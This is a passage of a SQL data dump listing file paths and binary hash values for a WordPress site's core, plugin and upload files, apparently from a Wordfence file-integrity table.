('PCb-Y��o�i8','wp-content/plugins/wordfence/js/jquery.colorbox-min.1722265817.js','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/js/jquery.colorbox-min.1722265817.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y5�=��q��)����','H��4\\��v��/X�G��K����:gkl','',0,'?'),
('PJ�~]��; ��`y','wp-includes/widgets/class-wp-widget-media-image.php','/var/www/html/ictbank/blog/wp-includes/widgets/class-wp-widget-media-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�ՔFi��ɓn','ʋ4ʁpq%��ٍVln�t#�a��Ltl5,;\n','',0,'?'),
('PK��2�I��)��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y��w5��(n�b�m�','m!`�~:��-\n�&3@��N���[�9��d\r�','',0,'?'),
('PLot�\0a�J�m�bc�','wp-content/plugins/elementor/assets/js/admin-modules.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/admin-modules.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�������Ԃv�D','{���sϧ�&K�\0��ö�|p\'5��D�ko��R','',0,'?'),
('PL��F^�9�R�6z�p','wp-includes/blocks/navigation-submenu/editor.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/navigation-submenu/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f�H�2X�m.��W','�\Z(f)�gW�NV�y�!�qܹzg��%��','',0,'?'),
('PN�B7A�G�d 6�h�','wp-content/plugins/elementor/core/editor/loader/v2/editor-v2-loader.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/editor/loader/v2/editor-v2-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�lnY����bw���','�ld��?�f�5�wӑ*(.~��[t|�P','',0,'?'),
('Pv��gI�x�S��P�','wp-content/plugins/elementor/core/common/modules/finder/categories/site.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/common/modules/finder/categories/site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tr�K�V�u<�&�b','BbB�?G�Q�I<B!H����^�+d���S;','',0,'?'),
('P�t�oSu��h`G�','wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/landing-pages-menu-item.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/landing-pages-menu-item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]<�5�b:�r�:�','E|�Z�\n���pJQs�����cZ���<','',0,'?'),
('P��iz�t�a�}�a','wp-admin/users.php','/var/www/html/ictbank/blog/wp-admin/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}2��+9�D��','ں�5T�i.��,2:iNE�������XZ$��;�','',0,'?'),
('P��n��0��Ig&�@','wp-content/plugins/elementor/modules/dev-tools/module.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/dev-tools/module.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2V!ϼz\r��ܨA','���~qr��J� �_��-� oD̯�<r�','',0,'?'),
('P�_BԤ����\"��O�','wp-content/plugins/wordpress-seo/css/dist/filter-explanation-2320.css','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/css/dist/filter-explanation-2320.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����h/��Q�j�ٮ{','[��ak���H���(IG(�9\0pH�wH\"�wu','',0,'?'),
('P���`,\ZcU�뱶)�','wp-content/plugins/elementor/core/common/modules/event-tracker/data/controller.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/common/modules/event-tracker/data/controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\�)\"��9^��rX','��9\r_[���}�<�^���~W}��P�!&�~y','',0,'?'),
('P��h���~��P�','wp-includes/blocks/page-list/style.css','/var/www/html/ictbank/blog/wp-includes/blocks/page-list/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8� �x�� ��vR<��','I�I�|{8�ʰ��$�N�i��0<&[�v�HV�^','',0,'?'),
('P������ _��Y','wp-content/uploads/2021/05/Buttons_OS01-100x100.jpg','/var/www/html/ictbank/blog/wp-content/uploads/2021/05/Buttons_OS01-100x100.jpg',0,'Юޓ9������.�Y�','Юޓ9������.�Y�','L�2����)3�����{�����n�a���.�','',0,'?'),
('P�ƃ��!�7NdS�l','wp-content/plugins/elementor-pro/assets/js/packages/editor-documents-extended/editor-documents-extended.strings.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/packages/editor-documents-extended/editor-documents-extended.strings.js',0,'�U�mX�����','�U�mX�����','��q6}t�\\C�HYS�[���ьg��','',0,'?'),
('P�F�ڠ��L���v~<','wp-content/uploads/2021/06/mysql-1024x760.jpg','/var/www/html/ictbank/blog/wp-content/uploads/2021/06/mysql-1024x760.jpg',0,'!��WK��X]�c�up�','!��WK��X]�c�up�','��m2�K_����f��t/�`%���p1�Y�','',0,'?'),
('P��\n�e���u�\"�','wp-includes/sodium_compat/lib/php72compat.php','/var/www/html/ictbank/blog/wp-includes/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�W��d��t��1�','�D㳌�*�z6ؕ(A\\��)�i�Ïܜ�o,','',0,'?'),
('Pè�&R�{(6�M�]8','wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/dashboard.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ϣ�7fU�c*','��\0p�����nh�a(�}/6X!+�����','',0,'?'),
('P�@���;b<\n�c�','wp-includes/class-wp-oembed-controller.php','/var/www/html/ictbank/blog/wp-includes/class-wp-oembed-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�G�w�E�JW�&','-#�&���{�̡��6�e`�C�+E��\'�\\�','',0,'?'),
('P�M�\Z�I̸�ݭY`r','wp-content/plugins/wordfence/lib/wfHelperString.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/wfHelperString.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')����`����E��','OM�Cn=��O5��h�K���E�,q�`���*�','',0,'?'),
('P��J1h��|���r�','wp-content/plugins/wordpress-seo/inc/class-wpseo-custom-taxonomies.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/inc/class-wpseo-custom-taxonomies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4��3����,','U�0`��7(t���Y��s�\\�h�tr(\'ݩ1�','',0,'?'),
('Pˏ�����%�z�','wp-content/plugins/elementor-pro/core/integrations/integrations-manager.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/core/integrations/integrations-manager.php',0,'IR�Nt\\`\\���Kr','IR�Nt\\`\\���Kr','C{2=����Mu\r�� \rk�l�Z�a}a����','',0,'?'),
('P�E��:^�N���\0*','wp-content/plugins/wordpress-seo/src/user-meta/framework/additional-contactmethods/pinterest.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/user-meta/framework/additional-contactmethods/pinterest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0��(���Mu]�� ��','�[E-v5!Bu����(偝/��a�ue3Gk','',0,'?'),
('Pݸ� �ׯ�l��14','wp-content/plugins/elementor-pro/modules/hotspot/widgets/hotspot.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/hotspot/widgets/hotspot.php',0,'�A.���BZ�_�\Z�v','�A.���BZ�_�\Z�v','��$2�\0S��� R^�L>s.��B�.]�Н��','',0,'?'),
('P�1$���\\*�C','wp-admin/images/stars-2x.png','/var/www/html/ictbank/blog/wp-admin/images/stars-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A���#�S�Me.^','[��耿�_(\rh���Y���T��qZ��','',0,'?'),
('P��0��a��R�z= ','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf','/var/www/html/ictbank/blog/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�gkeͿݾ���|�h','�H��zj鞨%�����p=�Z��iNA�Z�','',0,'?'),
('P�Zy7�qX�I9��','wp-includes/blocks/post-author-biography/block.json','/var/www/html/ictbank/blog/wp-includes/blocks/post-author-biography/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M?����a�� ay���w','���Dz�qp:\rʡkV&�FH+��ư�s� ��p','',0,'?'),
('P���VV�N{��j-','wp-content/plugins/wordpress-seo/admin/exceptions/class-file-size-exception.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/exceptions/class-file-size-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iy�v��#<��Q!��','�r���kv�\")6�B}�zE8�7R���E�','',0,'?'),
('QJ)�\ruCv�\n���Q','wp-content/plugins/elementor/app/modules/import-export/runners/revert/revert-runner-base.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/app/modules/import-export/runners/revert/revert-runner-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�)��2����Syd�','��}�A�� X@&�f����Ѽ�|孺�bs�','',0,'?'),
('Q\r��� V��Au�','wp-content/plugins/wordpress-seo/src/services/importing/conflicting-plugins-service.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/services/importing/conflicting-plugins-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R���J�$��&�>','�X��\n�C�Dn�;\'�+&$�7[��K��B�k','',0,'?'),
('Qef�X_���كY&�','wp-content/plugins/wordpress-seo/js/dist/externals/reduxJsToolkit.js','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/js/dist/externals/reduxJsToolkit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`H<_� ��7�:��','�S�Oی�P]����%>�φ+n�I�T��A�','',0,'?'),
('Q\'q;_W��&t��','wp-content/plugins/elementor/modules/link-in-bio/widgets/link-in-bio.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/link-in-bio/widgets/link-in-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1/¨$�1�8�`ړ��','U}�ǭMV}v�a6����~�n��ǂ$','',0,'?'),
('Q%Ep��au�]�G7�','wp-content/plugins/wordpress-seo/src/conditionals/new-settings-ui-conditional.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/conditionals/new-settings-ui-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Kh[J�!�N��','�P�\ZB\'A|!����ڔRm�%���(\\o#�+�\'','',0,'?'),
('Q4��Ī�EY@u(��q','wp-content/plugins/elementor-pro/modules/display-conditions/classes/dynamic-tags/custom-fields-data-provider.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/display-conditions/classes/dynamic-tags/custom-fields-data-provider.php',0,' ���\nԩ��yj���G',' ���\nԩ��yj���G','����\"����AZ=z.��Ѳ�=E��eSQ��','',0,'?'),
('Q6F�1K���r�+K�','wp-content/uploads/2020/02/cropped-ictbank-300x300.png','/var/www/html/ictbank/blog/wp-content/uploads/2020/02/cropped-ictbank-300x300.png',0,'Ո1ue���\'M!�N','Ո1ue���\'M!�N','��K�E�M�]�.0ßx��_�����L�8�','',0,'?'),
('Q;���(����Mp*�','wp-admin/js/widgets/media-widgets.min.js','/var/www/html/ictbank/blog/wp-admin/js/widgets/media-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d���G\\��)�n','�U�U�0n-�՟�b��&��NEc\\�5Ɠׁ!','',0,'?'),
('Q?��ٟ�g�L�|ua','wp-includes/class-wp-textdomain-registry.php','/var/www/html/ictbank/blog/wp-includes/class-wp-textdomain-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v!�(<�$�ę��۴�','i���2�t_`�Fh\" ES\\�r ��]T���','',0,'?'),
('QC�ȧ���$9B)��M','wp-includes/blocks/tag-cloud/style.css','/var/www/html/ictbank/blog/wp-includes/blocks/tag-cloud/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`�A�(����','7ђ�m\\Ve[��#?Z�\Z�Y�d{�Zr��#��','',0,'?'),
('QG3��G]^pXS~��','wp-content/plugins/wordpress-seo/src/conditionals/semrush-enabled-conditional.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/conditionals/semrush-enabled-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-I�\Zʑ*0\Z���7�','��\"-_z/�VFd�a���{�vp<f��i���&','',0,'?'),
('QT���*�f�P��.�','wp-admin/includes/file.php','/var/www/html/ictbank/blog/wp-admin/includes/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y�a@��\n��<e��','@o�o�d�_���!�-]Z*E��I��~��L�ߐ��','',0,'?'),
('QY��1�Tl��Vr<','wp-includes/js/customize-views.js','/var/www/html/ictbank/blog/wp-includes/js/customize-views.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"r�<`����D��','b2�M��!o�;�-�veq��\\f�]l����:','',0,'?'),
('Qn3X�?A\Z������-','wp-content/plugins/elementor-pro/modules/woocommerce/widgets/product-title.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/woocommerce/widgets/product-title.php',0,'mj@�� ҍ���','mj@�� ҍ���','{>��U7�,i����_m��^�H�\0�7��)ʏ','',0,'?'),
('Qq�P�OQ�����J��','wp-includes/fonts/class-wp-font-face.php','/var/www/html/ictbank/blog/wp-includes/fonts/class-wp-font-face.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<��<�K=4�ٶ*���','$|w�0�@c�^nwne�-f���{U˗�߇-�','',0,'?'),
('QuoPX��\0��Sڞ','wp-admin/images/bubble_bg.gif','/var/www/html/ictbank/blog/wp-admin/images/bubble_bg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�g<ć�I����0','\'+u�W�`-A�����S\'�}S~S��b���','',0,'?'),
('Q�&v�i��늛{��','wp-content/plugins/elementor-pro/modules/woocommerce/widgets/notices.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/woocommerce/widgets/notices.php',0,'��m?�J,��|%��','��m?�J,��|%��','\\�3�D,/�6 �(�<>@�E]�Pц�0','',0,'?'),
('Q��cm�uX\Z3�B+��X','wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�mR�_��`�W6�\0','s)W�?Pӎ�B�*?x�BZ��dɗ�eZٞ{','',0,'?'),
('Q���X�gI���?S~)','wp-content/plugins/elementor/assets/lib/font-awesome/css/regular.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/font-awesome/css/regular.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�Vnb�ɰ���2v\0a','#�r��^ss�pzm-+d?UL6A����c�','',0,'?'),
('Q���PA���鐚�z�','wp-includes/blocks/columns/editor-rtl.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/columns/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R���r��4{6G�','yU4��7��\"!��\'R�@��rO�k<=�NI\n~UX�','',0,'?'),
('Q���?��J�N;A','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1722265817.js','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1722265817.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�We�U{�9�','������G����8�=�\0�> �3�wg3.�4','',0,'?'),
('Q�P5Z���w�Nia�','wp-includes/blocks/quote/theme.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/quote/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E�v�b&�U��W{','$���0 8s;�_ I,�u[�\\��N���','',0,'?'),
('Q�}i)�s>��%U��u','wp-content/themes/twentytwentyfour/patterns/template-search-portfolio.php','/var/www/html/ictbank/blog/wp-content/themes/twentytwentyfour/patterns/template-search-portfolio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�g+SȲ�l�p#F�','�r4�9KPe�6��Z�G0��^d��/��','',0,'?'),
('Q��6K4������H','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i0���\Z��_�c','SBY��l�MЪ�D撧�}��\Z��+��>�#�};','',0,'?'),
('Q�x��̿Py���\'uE|','wp-includes/blocks/page-list/block.json','/var/www/html/ictbank/blog/wp-includes/blocks/page-list/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�-��ݒ�|�3���','��-x�Ñ�&�>�&�r\0�IB\r��\n�����/�','',0,'?'),
('Q��-�C-]C����','wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php','/var/www/html/ictbank/blog/wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E/i?�ݶ83|��E]','C�#�OK�Kؗ�B.FY�Ɖ+E�w��F�KY�9.','',0,'?'),
('Q�@9Few���#+�!','wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NCó��[\'�, ,��','���Х҇�Hh��Fݥ��mP�A�mae�xH','',0,'?'),
('Q�9nb7\rn�H/�?0,','wp-includes/js/dist/private-apis.min.js','/var/www/html/ictbank/blog/wp-includes/js/dist/private-apis.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~���Y�y̎=ӂ','M�f�ng��Wi�v-I���y2 �<��8��','',0,'?'),
('Q�`���8�M�8','wp-admin/press-this.php','/var/www/html/ictbank/blog/wp-admin/press-this.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':ƛ{t��Y[:��g\Z��','�i>[t\"{D[�\r:gU���l�t:P,�p�','',0,'?'),
('Q��4��%��z�>*��I','wp-content/plugins/wordpress-seo/inc/class-upgrade.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/inc/class-upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uA�8NO-s��w���','��S+b.iC����%��y���=�%��A�LQ','',0,'?'),
('Qˢ�I��E��Z0k','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-seopressor.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-seopressor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Of�ȶL����c','Q��+���V��\'?��H��ɦ�]ĈhX�\'\n ','',0,'?'),
('Q��KP`�0��l/n�','wp-content/plugins/elementor-pro/core/app/modules/site-editor/module.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/core/app/modules/site-editor/module.php',0,'#�\Z�q&8��x���','#�\Z�q&8��x���','��n4��\n~��%V6}B:�d�_�I��Vhr','',0,'?'),
('Q�F��~�@��=�','wp-content/plugins/elementor-pro/assets/css/templates/frontend-rtl.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/templates/frontend-rtl.min.css',0,'��\'���yw� �<E�','��\'���yw� �<E�','��<�w����ݹ ��X�X ���3��','',0,'?'),
('Q�G��7��2C\r�i','wp-includes/rest-api/endpoints/class-wp-rest-block-pattern-categories-controller.php','/var/www/html/ictbank/blog/wp-includes/rest-api/endpoints/class-wp-rest-block-pattern-categories-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�G-�3w��$vۼ +','#��C��:�v-!�����W����Ob���','',0,'?'),
('Q�.ì�\\���XeOI','wp-content/plugins/wordfence/views/dashboard/options-group-general.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/views/dashboard/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�t*�-6�ـX��','mV�d�h�I�∂�d����TK�{�z��\Z�','',0,'?'),
('Q��)*8O�ԫ4;�i','wp-content/plugins/wordpress-seo/src/helpers/wpdb-helper.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/helpers/wpdb-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y:\Z��6Q\rAe\'��D','B�H��\r$��i���$�Pd� �!٧9','',0,'?'),
('Q�����l��g�-��','wp-admin/js/comment.min.js','/var/www/html/ictbank/blog/wp-admin/js/comment.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�Xv4��\n����l�','�G��}P��8����wC�jIȀOKîX~��3','',0,'?'),
('R�v5��W6�`�ھ�','wp-includes/css/dist/nux/style.min.css','/var/www/html/ictbank/blog/wp-includes/css/dist/nux/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v(���b�JI%�\ZV','�������xE�g���$\0K�� ��3`��.?','',0,'?'),
('R3�Us�3��}T��','wp-includes/js/autosave.js','/var/www/html/ictbank/blog/wp-includes/js/autosave.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Nj�cJ�n�H�\'','��T%��#�5r����c5��꘩����m7','',0,'?'),
('R8y��Ҟ綄���','wp-includes/css/dist/block-editor/content-rtl.css','/var/www/html/ictbank/blog/wp-includes/css/dist/block-editor/content-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�\Z����LLƿ�?�','5W�\r�Q�?�+_�.֪TO�Jّ�)�$\r˚�?','',0,'?'),
('R<V���\Z�иE����','wp-content/plugins/elementor-pro/modules/theme-builder/conditions/author.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/theme-builder/conditions/author.php',0,'x�I2o��f�Xz�K�','x�I2o��f�Xz�K�','\\�f��p�z�`Q��P4��p���>&','',0,'?'),
('RQ�b7f�� |~ۓ�(','wp-admin/js/widgets.js','/var/www/html/ictbank/blog/wp-admin/js/widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�>�A�P�P�u4Ą�','�����v�5ᐪmє\"-�*~`�`Qg1F��/','',0,'?'),
('RV�`���2� Fy%�','wp-content/plugins/elementor/app/modules/import-export/runners/export/templates.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/app/modules/import-export/runners/export/templates.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Da��y��y�\nY','�x�B�0F��e����f����(̉g���u��','',0,'?'),
('Rhz���%�s!ӇVd','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-editor.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6.��V�h猜��/','D�oF|�8�)��!��Q>p8k~�2�{oY\\�hsU','',0,'?'),
('Rj�q�Iӏ\Z�Y&�','wp-includes/sodium_compat/src/Core/Curve25519/H.php','/var/www/html/ictbank/blog/wp-includes/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0\rJ`X�\"8�by','oHi��Y�N3 >����_����J�,���S^','',0,'?'),
('R��۾X�!�\r�T2��','wp-content/plugins/elementor-pro/assets/css/widget-posts-rtl.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/widget-posts-rtl.min.css',0,'�<�Y\"�dO��M��','�<�Y\"�dO��M��','\0�2I������)��V=��oǒ���(��r8T�','',0,'?'),
('R���1?���Y�VDt�','wp-content/plugins/wordfence/lib/.htaccess','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),
('R�b�:Z�K��L�','wp-admin/js/application-passwords.js','/var/www/html/ictbank/blog/wp-admin/js/application-passwords.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�\"5pC\05���P;�.',' �>W̞6���6��}{�F�+*�CWV�J','',0,'?'),
('R����q8U�{\0��','wp-content/plugins/wordpress-seo/src/surfaces/open-graph-helpers-surface.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/surfaces/open-graph-helpers-surface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\\9qP\ru!�s�D','���-rhC�*����?�Өo :Ç�o���','',0,'?'),
('R��A���H=��W�>�a','wp-content/plugins/wordpress-seo/src/integrations/integration-interface.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/integrations/integration-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��0\0N���D �F�','�Sl��fA� O� �w|=EB͐�Df���q','',0,'?'),
('R�x�4Mp@�9u\n֊ p','wp-includes/images/wpspin.gif','/var/www/html/ictbank/blog/wp-includes/images/wpspin.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$����n��4H{��','-*z�n�D�,\"aH�K�H�rޱ~\Zy��\Z�%�','',0,'?'),
('R��|Rx/�bzn9\0*�J','wp-admin/includes/plugin-install.php','/var/www/html/ictbank/blog/wp-admin/includes/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����b��KM�A.�','�f7h�����x��(�@�������\rl','',0,'?'),
('R���q��E�+`�F','wp-content/themes/hello-elementor/assets/images/go-pro.svg','/var/www/html/ictbank/blog/wp-content/themes/hello-elementor/assets/images/go-pro.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=2�}�w���.)ao/�','��ɚQ�GZ�V\\#,m�9uW�>B���5 ','',0,'?'),
('R�\\SC�|ju�9��A','wp-includes/js/media-grid.js','/var/www/html/ictbank/blog/wp-includes/js/media-grid.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�=^/���}f=�b','=K�?՝�t���]� ����y\"�*���@yT_��','',0,'?'),
('R¥�����Le�q �&�','wp-admin/js/user-suggest.js','/var/www/html/ictbank/blog/wp-admin/js/user-suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jl�,��f.�Vh��','��\ZԂ 8�՜g\\����IS�����グ6���','',0,'?'),
('R��ܰoL�8~\\�lCR','wp-includes/blocks/audio/editor.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/audio/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z���#�@ϛ���\0v','Ͳ���CO��R̋�<l%�n�\Z�S>��*','',0,'?'),
('R��ʪQ� ��\'gQ/','wp-content/plugins/elementor-pro/modules/forms/actions/slack.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/forms/actions/slack.php',0,'$�^�\r$U��E�~bk','$�^�\r$U��E�~bk',']�v����\r��y����d�F�,��YRX�\0�','',0,'?'),
('R�H\r0��!�d�?c&','wp-includes/widgets/class-wp-widget-categories.php','/var/www/html/ictbank/blog/wp-includes/widgets/class-wp-widget-categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���bo�fOճ�K�','�jc\n�y�;~;�3RH�3z4U����h��G','',0,'?'),
('R��G5�����to�$o','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-greg-high-performance-seo.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-greg-high-performance-seo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z\\��3\rfKct��L�','l�9X.���(������g���Z��SJ:(�*','',0,'?'),
('R�Ol��v�=h}�X\nf','wp-content/plugins/elementor-pro/modules/forms/classes/rest-client.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/forms/classes/rest-client.php',0,'�ѿC�*́��|�3s','�ѿC�*́��|�3s','��l��KH�gw�\r����zئu�AO#J��','',0,'?'),
('S?�d�xS���َ@','wp-includes/blocks/query-pagination/editor.css','/var/www/html/ictbank/blog/wp-includes/blocks/query-pagination/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A��L���4�vK�pA\\�','Uϵ��Rxvqͧ���%Ήz�u*����l','',0,'?'),
('S�M�Q�9(A��;?','wp-content/uploads/bb-plugin/cache/343-layout-draft-partial.css','/var/www/html/ictbank/blog/wp-content/uploads/bb-plugin/cache/343-layout-draft-partial.css',0,'��ُ\0�� ��B~','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),
